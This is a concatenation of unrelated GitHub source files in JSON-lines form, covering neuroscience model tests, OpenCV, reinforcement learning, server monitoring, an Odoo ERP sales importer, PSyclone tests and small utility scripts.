handled by the\n# HBP validation framework.\n# o instantiate the noDendtest with experimental_data\n# test = noDendtest(experimental_data)\n# o run the test on desired model\n# s = test.judge(desired_model, deep_error=True)\n# o then you can see the outputs to\n# s\n# s.score\n# s.description\n#\n# ============================================================================\n\nimport sciunit\nimport quantities as pq\nfrom elephant.statistics import mean_firing_rate as mfr\n\nfrom cerebunit.capabilities.cells.response import ProducesSpikeTrain\nfrom cerebunit.capabilities.cells.morphology import CanDisconnectDendrites\nfrom cerebunit.score_manager import BinaryScore\n\n\nclass NoDendritesTest(sciunit.Test, BinaryScore):\n '''\n The No Dendrites Test is a test for whether firing occurs (from the soma) when all the dendrites are disconnected from the soma. There is no current injection for this test.\n '''\n required_capabilities = (CanDisconnectDendrites,ProducesSpikeTrain,)\n score_type = BinaryScore\n\n def generate_prediction(self, model, verbose=False):\n '''\n Generates spike train from \"vm_soma\", cell region.\n The function is automatically called by sciunit.Test\n which this test is a child of.\n Therefore as part of sciunit generate_prediction is\n mandatory.\n '''\n setup_parameters = { \"dt\": 0.025, \"celsius\": 37,\n \"tstop\": 1000, \"v_init\": -65 }\n model.disconnect_dendrites_from_soma()\n model.set_simulation_properties(setup_parameters)\n model.produce_spike_train()\n return model\n\n def process_prediction(self, model):\n '''\n Once the model has run, this function can be used to\n process the spike_train prediction to get the\n prediction of interest, mean firing rate.\n '''\n cell_region = \"vm_soma\"\n x = mfr(model.predictions[\"spike_train\"][cell_region])\n return x.rescale(pq.Hz)\n\n\n def compute_score(self, observation, model, verbose=False):\n '''\n This is function like generate_prediction is called\n automatically by sciunit which this test is a child of.\n This function with the same name compute_score is also\n therefore mandatory.\n This function calls the function process_prediction to\n return the mean firing rate of spike train from vm_soma.\n This is then compared against the experimental_data to\n get the binary score; 0 if the prediction correspond\n with experiment, otherwise 1.\n '''\n processed_prediction = self.process_prediction(model)\n a_prediction = processed_prediction.item() # just the magnitude\n x = BinaryScore.compute( observation, a_prediction )\n score = BinaryScore(x)\n score.description = \"The No Dendrites attached to soma, Soma Firing test results in the prediction by the model to be \" + str(processed_prediction) + \" which means that the \" + str(score)\n if score.score==1:\n ans = \"The model \" + model.name + \" passed the \" + self.__class__.__name__ + \". It shows that firing from the soma is not due to the dendrites, i.e, spike originates from soma.\"\n else:\n ans = \"The model \" + model.name + \" failed the \" + self.__class__.__name__ + \". It shows that firing from the soma is due to the dendrites, i.e, spike does not originate from soma.\"\n return score\n","repo_name":"lungsi/cerebellum-unit","sub_path":"cerebunit/validation_tests/cells/PurkinjeCell/test_for_firing_without_dendrites.py","file_name":"test_for_firing_without_dendrites.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1423828526","text":"import cv2\r\n\r\n#open the Video file\r\n#cap = cv2.VideoCapture(0)\r\ncap = cv2.VideoCapture('IU.mp4')\r\ni = 0\r\n\r\nwhile(cap.isOpened()):\r\n ret, frame = cap.read()\r\n if ret == False:\r\n break\r\n\r\n cv2.imshow('hello', frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n cv2.imwrite(str(i)+ '.jpg', frame)\r\n i +=1\r\n\r\n#cap.release()\r\ncv2.destroyAllWindows()","repo_name":"yinmayoo185/OpenCV","sub_path":"Face Recognition System/video-processing.py","file_name":"video-processing.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8485915032","text":"import numpy as np\nfrom torch import nn\n\n\nclass QRDQN(nn.Module):\n\n def __init__(self, num_states, num_actions, N=200,\n sensitive=None, c=0):\n super(QRDQN, self).__init__()\n\n # Quantile network.\n self.q_net = nn.Sequential(\n nn.Linear(num_states, 512),\n nn.ReLU(),\n nn.Linear(512, num_actions * N),\n )\n\n self.N = N\n self.num_actions = num_actions\n self.sensitive = sensitive\n self.c = c\n self.num_cvar = int(np.ceil(self.N * self.c))\n\n def forward(self, states=None):\n batch_size = states.shape[0]\n\n quantiles = self.q_net(states).view(\n batch_size, self.N, self.num_actions)\n\n assert quantiles.shape == (batch_size, self.N, self.num_actions)\n\n return quantiles\n\n def calculate_q(self, states=None):\n batch_size = states.shape[0]\n\n # Calculate quantiles.\n quantiles = self(states=states)\n\n if self.c == 0:\n quantiles = quantiles\n elif self.sensitive:\n quantiles = quantiles[:, :self.num_cvar]\n else:\n quantiles = quantiles[:, -self.num_cvar+1:]\n\n # Calculate expectations of value distributions.\n q = quantiles.mean(dim=1)\n assert q.shape == (batch_size, self.num_actions)\n\n return q\n","repo_name":"ShogoAkiyama/rltorch2","sub_path":"frozen_lake/fqf_iqn/model/qrdqn.py","file_name":"qrdqn.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1906912209","text":"# 本程序找出list中告警数据(根据config中的告警值),并组合成一个大字符串,以备在钉钉中发出\nimport configRead\ndef color(infomationList):\n cpuAlarm1 = int(configRead.readConfig('alarm','cpuAlarm1')) # CPU 利用率超60%报警\n cpuAlarm2 = int(configRead.readConfig('alarm','cpuAlarm2')) # CPU 利用率超90%报警\n memAlarm1 = int(configRead.readConfig('alarm','memAlarm1')) # MEM 利用率超70%报警\n memAlarm2 = int(configRead.readConfig('alarm','memAlarm2')) # MEM 利用率超95%报警\n diskAlarm1 = int(configRead.readConfig('alarm','diskAlarm1')) # 磁盘 剩余空间低于30G 报橙色警\n diskAlarm2 = int(configRead.readConfig('alarm','diskAlarm2')) # 磁盘 剩余空间低于10G 报红色警\n \n alarmList=[]\n\n timeOut = configRead.readConfig('parameter','timeout')\n timeOut = '超时 time >'+str(timeOut)\n for line in infomationList:\n alarmLine=[]\n alarmLine.append(line[0])\n alarmLine.append(line[1])\n alarmLine.append(line[2])\n alarmLine.append(line[3])\n \n if line[3]==timeOut:\n alarmList.append(alarmLine)\n continue\n\n \n CPU = line[4]\n MEM = line[5]\n \n #CPU 报警处理 \n if int(line[4])>cpuAlarm2:\n CPU= giveColor(line[4],1)\n elif int(line[4])>cpuAlarm1:\n CPU= giveColor(line[4],2)\n \n CPU= 'CPU='+CPU+'%'\n alarmLine.append(CPU)\n\n #MEM 报警处理\n if int(line[5])>memAlarm2:\n MEM= giveColor(line[5],1)\n elif int(line[5])>memAlarm1:\n MEM= giveColor(line[5],2)\n MEM= 'MEM='+MEM+'%'\n alarmLine.append(MEM)\n\n alldisk = line[6].split(' ')\n diskstr=\"DISK: \"\n for d in alldisk:\n if d=='': #排除空值\n continue\n disk=d.split(':')\n diskAvliable=disk[1].split(r'/')\n if (int(diskAvliable[0])6): #剔除光驱 \n diskstr = diskstr + disk[0]+':'+ giveColor(diskAvliable[0],1) +r'/'+diskAvliable[1]+' '\n elif (int(diskAvliable[0])6): #剔除光驱:\n diskstr = diskstr + disk[0]+':'+ giveColor(diskAvliable[0],2) +r'/'+diskAvliable[1]+' '\n else:\n diskstr = diskstr + disk[0]+':'+ diskAvliable[0] +r'/'+diskAvliable[1]+' '\n\n\n alarmLine.append(diskstr)\n \n alarmList.append(alarmLine)\n return alarmList\n\n\ndef giveColor(string,color=1):\n if color==1:\n return '' + string + ''\n else:\n return '' + string + ''\n","repo_name":"sigerclx/python","sub_path":"python-book01/2018/2018-06/ServerHealth3/htmlAlarm.py","file_name":"htmlAlarm.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"4106342287","text":"from jinja2 import Environment, FileSystemLoader\nfrom pathlib import Path\nfrom datetime import datetime\n\nimport logging\n\nlog = logging.getLogger(\"output/template\")\n\n\nclass Template:\n def __init__(self, filename, template):\n self.filename = Path(datetime.now().strftime(filename))\n self.template = Path(template)\n\n def run(self, alertslist, steps, raw_config, time):\n file_loader = FileSystemLoader(str(self.template.parent))\n env = Environment(loader=file_loader)\n template = env.get_template(self.template.name)\n output = template.render(\n time=time, steps=steps, raw_config=raw_config, **alertslist.get_vars()\n )\n\n self.filename.write_text(output)\n log.info(f\"Wrote report to {self.filename} using template {self.template}\")\n","repo_name":"danielfett/yesses","sub_path":"yesses/outputs/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"15799314962","text":"import couchdb\nimport json\nimport sys\nimport requests\nimport argparse\n\n#This file is connecting the backend and frontend\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-n\", \"--name\", help = \"Enter the name of the design document!\", required = True)\n parser.add_argument(\"-s\", \"--server\", help = \"Enter the ip address of your Couchdb Server! Please INCLUDE USERNAME:PASSWORD and end with '/'!!!\", required = True)\n parser.add_argument(\"-d\", \"--database\", help = \"Enter your Database's name!\", required = True)\n args = parser.parse_args()\n\n view_name = str(args.name)\n ip = str(args.server)\n db_name = str(args.database)\n\n server = couchdb.Server(ip)\n db = server[db_name]\n\n try:\n total = json.loads(requests.get(ip + db_name + \"/_design/\" + view_name + \"/_view/count\").text)[\"rows\"][0]['value']\n result = json.loads(requests.get(ip + db_name + \"/_design/\" + view_name + \"/_view/point_without_zero\").text)[\"rows\"]\n points = 0\n pos_count = 0\n ngtv_count = 0\n\n for i in range(0, len(result)):\n points += float(result[i]['value'])\n if float(result[i]['value']) > 0:\n pos_count += 1\n elif float(result[i]['value']) < 0:\n ngtv_count += 1\n \n pos_percent = pos_count / total\n nega_percent = ngtv_count / total\n\n print(total)\n print(pos_percent)\n print(nega_percent)\n\n except Exception as e:\n print(\"Error Here\")\n sys.exit(1)","repo_name":"cchalres/ccc-assmt2","sub_path":"MapReduce-Yucheng-Gu-955069/FrontEnd.py","file_name":"FrontEnd.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16790579868","text":"from odoo import _, api, fields, models\nfrom odoo.exceptions import UserError, ValidationError\nfrom datetime import datetime\n\n\nclass IFDBPowerNetSalesHeader(models.Model):\n _name = 'ss_erp.ifdb.powernet.sales.header'\n _inherit = ['mail.thread', 'mail.activity.mixin']\n _description = 'PowerNetヘッダ'\n\n upload_date = fields.Datetime('アップロード日時', index=True,\n default=fields.Datetime.now)\n name = fields.Char('名称')\n user_id = fields.Many2one('res.users', '担当者', index=True)\n branch_id = fields.Many2one('ss_erp.organization', '支店', index=True)\n status = fields.Selection(selection=[\n ('wait', '処理待ち'),\n ('success', '成功'),\n ('error', 'エラーあり')\n ], string='ステータス', default=\"wait\", store=True, compute='_compute_status')\n\n powernet_sale_record_ids = fields.One2many(\n comodel_name=\"ss_erp.ifdb.powernet.sales.detail\",\n inverse_name=\"powernet_sales_header_id\",\n string=\"PowerNet販売記録の詳細\"\n )\n has_data_import = fields.Boolean(compute='_compute_has_data_import')\n\n @api.constrains(\"branch_id\")\n def _check_default_warehouse(self):\n for record in self:\n if not record.branch_id.warehouse_id:\n raise ValidationError(_(\"対象の支店にデフォルト倉庫が設定されていません。組織マスタの設定を確認してください。\"))\n\n @api.depends('powernet_sale_record_ids')\n def _compute_has_data_import(self):\n for record in self:\n if record.powernet_sale_record_ids:\n record.has_data_import = True\n else:\n record.has_data_import = False\n\n @api.constrains(\"name\")\n def _check_name(self):\n for record in self:\n name_unique = self.env['ss_erp.ifdb.powernet.sales.header'].search_count(\n [('name', '=', record.name)])\n if name_unique > 1:\n raise ValidationError(_(\"ファイルヘッダー名は検索に使用されます。一意にしてください。\"))\n\n @api.depends('powernet_sale_record_ids.status')\n def _compute_status(self):\n for record in self:\n record.status = 'wait'\n if record.powernet_sale_record_ids:\n status_list = record.powernet_sale_record_ids.mapped('status')\n if 'error' in status_list:\n record.status = 'error'\n elif 'wait' in status_list:\n record.status = 'wait'\n else:\n record.status = 'success'\n\n def action_import(self):\n self.ensure_one()\n self.upload_date = fields.Datetime.now()\n return {\n \"type\": \"ir.actions.client\",\n \"tag\": \"import\",\n \"params\": {\n \"model\": \"ss_erp.ifdb.powernet.sales.detail\",\n \"context\": {\n \"default_import_file_header_model\": self._name,\n \"default_import_file_header_id\": self.id,\n },\n }\n }\n\n def processing_execution(self):\n for r in self:\n r._processing_excution()\n\n def _processing_excution(self):\n self.ensure_one()\n\n customer_code = self.env['ir.config_parameter'].sudo().get_param('powernet.direct.sales.dummy.customer_id')\n if not customer_code:\n raise UserError(\n _('直売売上用の顧客コードの取得失敗しました。システムパラメータに次のキーが設定されているか確認してください。(powernet.direct.sales.dummy.customer_id)'))\n\n customer_id = self.env['res.partner'].search([('ref', '=', customer_code)], limit=1)\n if not customer_id:\n raise UserError(\n _('設定している取引先コードは存在しません。'))\n\n # 2022/06/30 設計書の変更によりの追加\n gas_product_id = self.env['ir.config_parameter'].sudo().get_param('powernet.gas.basic.charge.product_id')\n if not gas_product_id:\n raise UserError(\n _('ガス基本料金のプロダクトIDの取得失敗しました。システムパラメータに次のキーが設定されているか確認してください。(powernet.gas.basic.charge.product_id)'))\n\n gas_usage_product_id = self.env['ir.config_parameter'].sudo().get_param('powernet.gas.usage.fee.product_id')\n if not gas_usage_product_id:\n raise UserError(\n _('ガス従量料金のプロダクトIDの取得失敗しました。システムパラメータに次のキーが設定されているか確認してください。(powernet.gas.usage.fee.product_id)'))\n\n product_ids = self.env['product.template'].search([]).ids\n if int(gas_product_id) not in product_ids or int(gas_usage_product_id) not in product_ids:\n raise UserError(\n _('設定しているプロダクトIDは、プロダクトマスタに存在しません。プロダクトマスタを確認してください。'))\n\n exe_data = self.powernet_sale_record_ids.filtered(lambda line: line.status in ('wait', 'error')).sorted(\n key=lambda k: (k['sales_date'], k['customer_code'], k['data_types']))\n\n # Get list product uom exchange\n powernet_type_ids = self.env['ss_erp.external.system.type'].search([('code', '=', 'power_net')]).mapped('id')\n convert_product_unit_type_ids = self.env['ss_erp.convert.code.type'].search(\n [('code', '=', 'product_unit')]).mapped('id')\n uom_code_convert = self.env['ss_erp.code.convert'].search(\n [('external_system', 'in', powernet_type_ids),\n ('convert_code_type', 'in', convert_product_unit_type_ids)]).sorted(\n key=lambda k: (k['external_code'], k['priority_conversion']))\n\n uom_dict = {}\n for uom in uom_code_convert:\n if not uom_dict.get(uom['external_code']):\n uom_dict[uom['external_code']] = uom['internal_code'].id\n\n tax_dict = {}\n tax_ids = self.env['ss_erp.code.convert'].search([]).filtered(\n lambda x: x.external_system.code == 'power_net' and x.convert_code_type.code == 'tax')\n for tax in tax_ids:\n tax_dict[tax.external_code] = tax.internal_code.id\n\n list_product_ids = self.env['product.product'].search([])\n product_product_ids = list_product_ids.mapped('id')\n\n base_gas_charge_id = list_product_ids.filtered(lambda x: x.product_tmpl_id.name == 'ガス基本料金').id\n metered_gas_charge_id = list_product_ids.filtered(lambda x: x.product_tmpl_id.name == 'ガス従量料金').id\n\n failed_so = []\n success_dict = {}\n for line in exe_data:\n key = str(line.sales_date) + '_' + str(line.customer_code)\n error_message = False\n if int(line.product_code) not in product_product_ids:\n line.status = 'error'\n error_message = '商品コードがプロダクトマスタに存在しません。'\n\n if not uom_dict.get(line.unit_code):\n line.status = 'error'\n if error_message:\n error_message += '単位コードの変換に失敗しました。コード変換マスタを確認してください。'\n else:\n error_message = '単位コードの変換に失敗しました。コード変換マスタを確認してください。'\n\n if not tax_dict.get(line.search_remarks_4):\n line.status = 'error'\n if error_message:\n error_message += '税コードの変換に失敗しました。コード変換マスタを確認してください。'\n else:\n error_message = '税コードの変換に失敗しました。コード変換マスタを確認してください。'\n\n if not error_message:\n if key in failed_so:\n continue\n else:\n # 2022/06/30 販売伝票を作成する際に、プロダクトIDが上記で取得したガス基本料金のプロダクトIDと一致する場合、数量を「1」で更新する。\n if int(line.product_code) == int(gas_product_id):\n quantity = 1\n product_id = int(gas_product_id)\n if line.product_name == 'ガス従量料金':\n product_id = int(gas_usage_product_id)\n else:\n quantity = line.quantity\n product_id = int(line.product_code)\n\n order_line = {\n 'product_id': product_id,\n 'product_uom_qty': quantity,\n 'product_uom': uom_dict[line.unit_code],\n 'tax_id': [(4, tax_dict.get(line.search_remarks_4))]\n }\n\n # 2022/05/09 Add new client_order_ref\n client_order_ref = '%s:%s' % (line.customer_code, line.search_remarks_6)\n\n if not success_dict.get(key):\n so = {\n 'x_organization_id': self.branch_id.id,\n 'warehouse_id': self.branch_id.warehouse_id.id,\n 'partner_id': customer_id.id,\n 'partner_invoice_id': customer_id.id,\n 'partner_shipping_id': customer_id.id,\n 'date_order': line.sales_date,\n 'state': 'draft',\n 'x_no_approval_required_flag': True,\n 'order_line': [(0, 0, order_line)],\n 'client_order_ref': client_order_ref,\n }\n success_dict[key] = so\n else:\n success_dict[key]['order_line'].append((0, 0, order_line))\n else:\n if key not in failed_so:\n failed_so.append(key)\n if success_dict.get(key, False):\n success_dict.pop(key, None)\n line.write({\n 'status': 'error',\n 'error_message': error_message\n })\n\n for key, value in success_dict.items():\n sale_id = self.env['sale.order'].create(value)\n success_dict[key]['sale_id'] = sale_id.id\n\n success_list = success_dict.keys()\n for line in exe_data:\n key = str(line.sales_date) + '_' + str(line.customer_code)\n if key in success_list:\n line.update({\n 'status': 'success',\n 'sale_id': success_dict[key]['sale_id'],\n 'processing_date': datetime.now(),\n 'error_message': False,\n })\n\n\nclass IFDBPowerNetSalesHeadDetail(models.Model):\n _name = 'ss_erp.ifdb.powernet.sales.detail'\n _description = 'PowerNet詳細'\n\n powernet_sales_header_id = fields.Many2one('ss_erp.ifdb.powernet.sales.header', 'PowerNetセールスヘッダー',\n required=True, ondelete=\"cascade\")\n status = fields.Selection(selection=[\n ('wait', '処理待ち'),\n ('success', '成功'),\n ('error', 'エラー')\n ], string='ステータス', default=\"wait\", required=True)\n processing_date = fields.Datetime('処理日時', index=True)\n customer_code = fields.Char('需要家コード', index=True)\n billing_summary_code = fields.Char('請求まとめコード')\n sales_date = fields.Date('売上日', index=True)\n slip_type = fields.Char('伝票種類')\n slip_no = fields.Char('伝票No')\n data_types = fields.Char('データ種類', index=True)\n cash_classification = fields.Char('現金/掛け区分')\n product_code = fields.Char('商品コード')\n product_code_2 = fields.Char('商品コード 2')\n product_name = fields.Char('商品名')\n product_remarks = fields.Char('商品備考')\n sales_category = fields.Char('売上区分')\n quantity = fields.Float('数量')\n unit_code = fields.Char('単位コード')\n unit_price = fields.Float('単価')\n amount_of_money = fields.Float('金額')\n consumption_tax = fields.Float('消費税')\n sales_amount = fields.Float('売上額')\n quantity_after_conversion = fields.Float('換算後数量')\n search_remarks_1 = fields.Char('検索備考 1')\n search_remarks_2 = fields.Char('検索備考 2')\n search_remarks_3 = fields.Char('検索備考 3')\n search_remarks_4 = fields.Char('検索備考 4')\n search_remarks_5 = fields.Char('検索備考 5')\n search_remarks_6 = fields.Char('検索備考 6')\n search_remarks_7 = fields.Char('検索備考 7')\n search_remarks_8 = fields.Char('検索備考 8')\n search_remarks_9 = fields.Char('検索備考 9')\n search_remarks_10 = fields.Char('検索備考 10')\n sales_classification_code_1 = fields.Char('販売分類コード 1')\n sales_classification_code_2 = fields.Char('販売分類コード 2')\n sales_classification_code_3 = fields.Char('販売分類コード 3')\n consumer_sales_classification_code_1 = fields.Char('需要家販売分類コード 1')\n consumer_sales_classification_code_2 = fields.Char('需要家販売分類コード 2')\n consumer_sales_classification_code_3 = fields.Char('需要家販売分類コード 3')\n consumer_sales_classification_code_4 = fields.Char('需要家販売分類コード 4')\n consumer_sales_classification_code_5 = fields.Char('需要家販売分類コード 5')\n product_classification_code_1 = fields.Char('商品分類コード 1')\n product_classification_code_2 = fields.Char('商品分類コード 2')\n product_classification_code_3 = fields.Char('商品分類コード 3')\n error_message = fields.Char('エラーメッセージ')\n sale_id = fields.Many2one('sale.order', '販売オーダ参照')\n","repo_name":"alubena/sanin-sanso-training","sub_path":"ss_erp_external_data_import/models/ss_erp_ifdb_powernet_sales_header.py","file_name":"ss_erp_ifdb_powernet_sales_header.py","file_ext":"py","file_size_in_byte":14195,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10235082156","text":"'''\n< N & M >\n문제)\n- N개의 자연수와 자연수 M이 주어졌을 때, 아래 조건을 만족하는 길이가 M인 수열을 모두 구하는 프로그램을 작성 하시오\n - N개의 자연수 중에서 M개를 고른 수열\n입력)\n- 1 : N, M ~ [1 \\ 8]\n- 2 : N개의 수가 주어진다.\n출력)\n- 1 : 조건에 만족하는 수열 출력 중복되는 수열 여러번 출력하면 안됨\\\n 사전순 출력\n'''\nimport sys\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\nnums = list(map(int, input().split()))\nnums.sort()\nvisited = [0] * (n)\ntmp = []\n\ndef dfs(x):\n global tmp, visited\n if x == m:\n print(*tmp)\n return\n prev = 0\n for i in range(n):\n if visited[n]: continue\n if nums[i] == prev: continue\n visited[i] = 1\n tmp.append(nums[i])\n prev = nums[i]\n dfs(x + 1)\n visited[i] = 0\n tmp.pop()\n\ndfs(0)\n\n\n \n\n","repo_name":"ByeonghwiJeong/Algorithm_Study","sub_path":"05_Study/23_01/07_백트레킹/15663.py","file_name":"15663.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74603310501","text":"import pandas as pd\r\nimport csv\r\nimport sys\r\nimport re\r\n\r\n\r\n\"\"\"\r\nheuristic: remove textual content that appears at least on x% of subpages of a domain\r\nand delete duplicate text information\r\n-> alternatively: delete non-unique text information!\r\nTO-DO: consider tag path as well (?)\r\n\"\"\"\r\ndef withinRelev(mode):\r\n data = pd.read_csv(\"data.csv\", sep=\";\")\r\n temp = data.groupby([\"bvdidID\", \"text\"]).nunique(\"urlID\")\r\n temp[\"bvdidID\"] = [i[0] for i in temp.index]\r\n temp[\"text\"] = [i[1] for i in temp.index]\r\n temp = temp.reset_index(drop=True)\r\n if mode==\"all\":\r\n ##only keep unique text information\r\n temp = temp[temp[\"urlID\"]==1]\r\n data = pd.merge(data, temp, on=[\"bvdidID\", \"text\"], how=\"inner\")\r\n else:\r\n ##remove text that appears on x% of the subpages\r\n countUrl = data.groupby([\"bvdidID\"]).nunique(\"urlID\")\r\n countUrl[\"bvdidID\"] = countUrl.index\r\n combined = pd.merge(temp[[\"bvdidID\",\"text\",\"urlID\"]],countUrl[[\"bvdidID\",\"urlID\"]],\"left\",on=\"bvdidID\")\r\n combined = combined[combined[\"urlID_x\"]<0.8*combined[\"urlID_y\"]]\r\n ##index text variable -> check for large data amounts\r\n data = pd.merge(data, combined[[\"bvdidID\", \"text\"]], [\"bvdidID\", \"text\"], how=\"inner\")\r\n ##remove duplicate text\r\n data = data.drop_duplicates([\"bvdidID\", \"text\"])\r\n data.to_csv(\"data1.csv\", sep=\";\", index=False, encoding=\"utf-8\", quoting=csv.QUOTE_ALL)\r\n\r\n\r\n\"\"\"\r\nprepare labelled data for between relevance classification\r\nassumptions: rel.: first page of domain and heuristic based; irrel.: heuristic based\r\n\"\"\"\r\ndef prepData4BR():\r\n data = pd.read_csv(\"data_embedded.csv\", sep=\";\")\r\n data[\"text2id\"] = data[\"text2id\"].apply(lambda x: list(map(int, re.findall(\"\\d+\", x))))\r\n ##to-do: used indexing when speed issues\r\n urls = data[\"url_x\"].unique()\r\n ##main page\r\n subdata = data[data[\"urlID_x\"]==0]\r\n relev = pd.DataFrame(subdata.groupby(\"bvdidID\")[\"text2id\"].apply(lambda x: x.sum()))\r\n relev.reset_index(inplace=True)\r\n relev[\"urlID_x\"] = 0\r\n ##list of keywords in urls that very likely define a relevant webpage\r\n identRelev = \"(about|product|service)\"\r\n keepRelev = [i for i in urls if re.search(identRelev,i) is not None]\r\n relev2 = data[data[\"url_x\"].isin(keepRelev)]\r\n relev2 = pd.DataFrame(relev2.groupby([\"bvdidID\", \"urlID_x\"])[\"text2id\"].apply(lambda x: x.sum()))\r\n relev2.reset_index(inplace=True)\r\n relev = relev.append(relev2, sort=True)\r\n relev[\"relevant\"] = 1\r\n ##list of keywords in urls that very likely define an irrelevant webpage\r\n identIrrelev = \"(termsofuse|privacy|data|contact|impressum|search|disclaimer|cookie|investors|site-terms|faqs|compliance|login|support)\"\r\n keepIrrelev = [i for i in urls if re.search(identIrrelev,i) is not None]\r\n irrelev = data[data[\"url_x\"].isin(keepIrrelev)]\r\n irrelev = pd.DataFrame(data.groupby([\"bvdidID\", \"urlID_x\"])[\"text2id\"].apply(lambda x: x.sum()))\r\n irrelev.reset_index(inplace=True)\r\n irrelev[\"relevant\"] = 0\r\n output = pd.concat([relev, irrelev], axis=0, ignore_index=True, sort=True)\r\n ##to-do: check for ambigious cases\r\n output = output.drop_duplicates([\"bvdidID\", \"urlID_x\"])\r\n output.to_csv(\"dataBetweenRelevance.csv\", sep=\";\", index=False, encoding=\"utf-8\", quoting=csv.QUOTE_ALL)\r\n \r\n\r\n\"\"\"\r\nremove complete subdomains related to AGBs, data privacy, and similar\r\n\"\"\"\r\ndef betweenRelev():\r\n prepData4BR()\r\n ##estimate classification model in tf using word embeddings\r\n ...\r\n\r\n\r\nif __name__==\"__main__\":\r\n if sys.argv[1]==\"within\":\r\n withinRelev(mode=\"all\")\r\n elif sys.argv[1]==\"between\":\r\n prepData4BR()\r\n ##betweenRelev()\r\n else:\r\n raise ValueError(\"Please provide a valid argument.\")\r\n","repo_name":"jakob-ra/webcrawl_networks","sub_path":"code/relevantText.py","file_name":"relevantText.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34301003061","text":"import os\n\nfrom fparser.common.readfortran import FortranStringReader\nfrom psyclone.psyGen import PSyFactory\nfrom psyclone.transformations import ACCEnterDataTrans, ACCKernelsTrans\n\n\n# Constants\nAPI = \"nemo\"\n# Location of the Fortran files associated with these tests\nBASE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n \"../../test_files\")\n\n# Test code with explicit NEMO-style do loop\nEXPLICIT_DO = (\"program explicit_do\\n\"\n \" REAL :: r\\n\"\n \" INTEGER :: ji, jj, jk\\n\"\n \" INTEGER, PARAMETER :: jpi=3, jpj=5, jpk=7\\n\"\n \" REAL, DIMENSION(jpi, jpj, jpk) :: umask\\n\"\n \" DO jk = 1, jpk\\n\"\n \" DO jj = 1, jpj\\n\"\n \" DO ji = 1, jpi\\n\"\n \" umask(ji,jj,jk) = ji*jj*jk/r\\n\"\n \" END DO\\n\"\n \" END DO\\n\"\n \" END DO\\n\"\n \"end program explicit_do\\n\")\n\n\ndef test_apply_to_explicit_loop(parser, fortran_writer):\n '''\n Check code generation for enclosing a single explicit loop containing a\n kernel inside a data region.\n\n '''\n reader = FortranStringReader(EXPLICIT_DO)\n code = parser(reader)\n psy = PSyFactory(API, distributed_memory=False).create(code)\n schedule = psy.invokes.get('explicit_do').schedule\n acc_kernels = ACCKernelsTrans()\n acc_kernels.apply(schedule.children)\n acc_trans = ACCEnterDataTrans()\n acc_trans.apply(schedule)\n code = fortran_writer(schedule)\n # Check the enter data directive captures all variables read and written in\n # the loop except for the NEMO loop iterator variables.\n assert (\" real, dimension(jpi,jpj,jpk) :: umask\\n\"\n \"\\n\"\n \" !$acc enter data copyin(jpi,jpj,jpk,r,umask)\\n\"\n \" !$acc kernels\\n\"\n \" do jk = 1, jpk\") in code\n\n assert (\" enddo\\n\"\n \" !$acc end kernels\\n\"\n \"\\n\"\n \"end program explicit_do\") in code\n","repo_name":"stfc/PSyclone","sub_path":"src/psyclone/tests/domain/nemo/transformations/enter_data_test.py","file_name":"enter_data_test.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"35"} +{"seq_id":"46063100813","text":"from semantic_release import ci_checks\n\n\ndef test_check_should_call_travis_with_correct_env_variable(mocker, monkeypatch):\n mock_travis = mocker.patch('semantic_release.ci_checks.travis')\n monkeypatch.setenv('TRAVIS', 'true')\n ci_checks.check('master')\n mock_travis.assert_called_once_with('master')\n\n\ndef test_check_should_call_semaphore_with_correct_env_variable(mocker, monkeypatch):\n mock_semaphore = mocker.patch('semantic_release.ci_checks.semaphore')\n monkeypatch.setenv('SEMAPHORE', 'true')\n ci_checks.check('master')\n mock_semaphore.assert_called_once_with('master')\n\n\ndef test_check_should_call_frigg_with_correct_env_variable(mocker, monkeypatch):\n mock_frigg = mocker.patch('semantic_release.ci_checks.frigg')\n monkeypatch.setenv('FRIGG', 'true')\n ci_checks.check('master')\n mock_frigg.assert_called_once_with('master')\n","repo_name":"atswany/TestingOnly","sub_path":"tests/ci_checks/test_checker.py","file_name":"test_checker.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18029171659","text":"\r\n# ----------------------------------------------------------------------------------------\r\nfrom .common import Plurals, Singulars, get_object\r\nfrom .route import ROUTES\r\nfrom .acl import ACLS\r\nfrom .acg import OBJS\r\n\r\n# ----------------------------------------------------------------------------------------\r\ndef _get_instances_lists_dict(config_list):\r\n\t\"\"\"creates and returns dictionary with list of configurations of sub-instances\r\n\t--> dict\r\n\t\"\"\"\r\n\t_instances_dict\t= {}\r\n\tinstance_name = None\r\n\tfor line in config_list:\r\n\t\tif line.rstrip().endswith(\" !!\") and line.startswith(\"!! START\"):\r\n\t\t\tinstance_name = \" \".join(line[3:-3].split()[1:])\r\n\t\t\t_instances_dict[instance_name] = []\r\n\t\t\t_instance_list = _instances_dict[instance_name]\r\n\t\telif 